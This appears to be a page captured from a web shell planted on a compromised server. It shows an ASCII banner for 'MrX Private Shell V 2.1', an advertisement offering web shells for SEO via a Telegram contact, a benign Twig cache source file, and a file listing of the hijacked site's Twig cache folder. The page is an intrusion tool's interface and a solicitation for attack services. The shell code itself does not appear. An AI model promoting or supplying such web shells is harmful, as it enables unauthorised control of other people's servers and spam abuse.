__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Cache; /** * Implements a cache on the filesystem that can only be read, not written to. * * @author Quentin Devos <[email protected]> */ class ReadOnlyFilesystemCache extends FilesystemCache { public function write(string $key, string $content): void { // Do nothing with the content, it's a read-only filesystem. } }
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| CacheInterface.php | File | 1.14 KB | 0644 |
|
| ChainCache.php | File | 2.1 KB | 0644 |
|
| FilesystemCache.php | File | 2.77 KB | 0644 |
|
| NullCache.php | File | 788 B | 0644 |
|
| ReadOnlyFilesystemCache.php | File | 560 B | 0644 |
|
| RemovableCacheInterface.php | File | 381 B | 0644 |
|